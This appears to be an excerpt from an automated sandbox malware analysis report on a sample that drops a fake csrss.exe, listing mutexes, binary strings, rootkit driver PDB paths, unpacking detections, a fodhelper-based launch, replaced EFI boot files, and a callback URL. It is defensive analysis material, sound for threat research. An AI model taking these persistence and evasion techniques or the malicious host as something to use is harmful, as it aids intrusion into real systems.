Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_01
Source: C:\Windows\rss\csrss.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5580:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3212:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1956:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4004:120:WilError_01

Source: 4t4y4r89UZ.exe	String found in binary or memory: application/app/install.go
Source: 4t4y4r89UZ.exe	String found in binary or memory: application/app/install.go
Source: 4t4y4r89UZ.exe	String found in binary or memory: application/resilience/btcblockchain/address.go
Source: 4t4y4r89UZ.exe	String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: csrss.exe	String found in binary or memory: application/app/install.go
Source: csrss.exe	String found in binary or memory: application/resilience/btcblockchain/address.go
Source: csrss.exe	String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: csrss.exe	String found in binary or memory: application/app/install.go
Source: csrss.exe	String found in binary or memory: application/resilience/btcblockchain/address.go
Source: csrss.exe	String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: csrss.exe	String found in binary or memory: application/app/install.go
Source: csrss.exe	String found in binary or memory: application/resilience/btcblockchain/address.go
Source: csrss.exe	String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: csrss.exe	String found in binary or memory: application/app/install.go
Source: csrss.exe	String found in binary or memory: application/resilience/btcblockchain/address.go
Source: csrss.exe	String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume

Source: C:\Windows\rss\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\rss\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\rss\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\rss\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\rss\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\rss\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\rss\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 4t4y4r89UZ.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: C:\Windows\System32\fodhelper.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: 4t4y4r89UZ.exe

Static file information: File size 4520488 > 1048576

Source: 4t4y4r89UZ.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x437a00

Source: 4t4y4r89UZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 4t4y4r89UZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 4t4y4r89UZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 4t4y4r89UZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 4t4y4r89UZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 4t4y4r89UZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 4t4y4r89UZ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Loader.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: EfiGuardDxe.pdb7 source: csrss.exe, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp
Source:	Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: Age does not matchThe module age and .pdb age do not match. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: symsrv.pdb source: csrss.exe
Source:	Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Downloading symbols for [%s] %ssrvsymsrvhttp://https://_bad_pdb_file.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: Unable to locate the .pdb file in this location source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: The module signature does not match with .pdb signature. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: .pdb.dbg source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: '(EfiGuardDxe.pdbx source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: symsrv.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.551813836.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.363596992.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.392506023.0000000000C55000.00000040.00020000.sdmp
Source:	Binary string: or you do not have access permission to the .pdb location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: EfiGuardDxe.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: dbghelp.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: dbghelp.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Unpacked PE file: 0.2.4t4y4r89UZ.exe.400000.3.unpack
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Unpacked PE file: 10.2.4t4y4r89UZ.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 14.2.csrss.exe.400000.0.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 23.2.csrss.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 34.2.csrss.exe.400000.3.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 42.2.csrss.exe.400000.1.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 50.2.csrss.exe.400000.0.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 50.2.csrss.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Unpacked PE file: 0.2.4t4y4r89UZ.exe.400000.3.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Unpacked PE file: 10.2.4t4y4r89UZ.exe.400000.2.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 14.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 23.2.csrss.exe.400000.2.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 34.2.csrss.exe.400000.3.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 42.2.csrss.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 50.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;

Source: injector.exe.14.dr	Static PE information: section name: _RDATA
Source: windefender.exe.14.dr	Static PE information: section name: UPX2
Source: bootmgfw.efi.14.dr	Static PE information: section name: .xdata
Source: bootx64.efi.14.dr	Static PE information: section name: .xdata
Source: EfiGuardDxe.efi.14.dr	Static PE information: section name: .xdata
Source: NtQuerySystemInformationHook.dll.14.dr	Static PE information: section name: _RDATA

Source: NtQuerySystemInformationHook.dll.14.dr	Static PE information: real checksum: 0x0 should be: 0x2279d
Source: EfiGuardDxe.efi.14.dr	Static PE information: real checksum: 0x4a5a6 should be: 0x51a75
Source: windefender.exe.14.dr	Static PE information: real checksum: 0x0 should be: 0x20ae45
Source: bootmgfw.efi.14.dr	Static PE information: real checksum: 0x2199 should be: 0x4c78
Source: injector.exe.14.dr	Static PE information: real checksum: 0x0 should be: 0x54ea2
Source: bootx64.efi.14.dr	Static PE information: real checksum: 0x2199 should be: 0x4c78
Source: csrss.exe.10.dr	Static PE information: real checksum: 0x45db04 should be: 0x4549c8
Source: 4t4y4r89UZ.exe	Static PE information: real checksum: 0x45db04 should be: 0x4549c8

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior:

Creates files in the system32 config directory

Show sources

Source: C:\Windows\System32\netsh.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub

Jump to behavior

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\System32\fodhelper.exe

Executable created and started: C:\Windows\rss\csrss.exe

Drops PE files with benign system names

Show sources

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe

File created: C:\Windows\rss\csrss.exe

Jump to dropped file

Source: C:\Windows\rss\csrss.exe	File created: C:\EFI\Microsoft\Boot\bootmgfw.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\EFI\Boot\bootx64.efi	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\EFI\Boot\EfiGuardDxe.efi	Jump to dropped file

Source: C:\Windows\rss\csrss.exe	File created: B:\EFI\Boot\old.efi (copy)	Jump to dropped file
Source: C:\Windows\rss\csrss.exe	File created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	Jump to dropped file
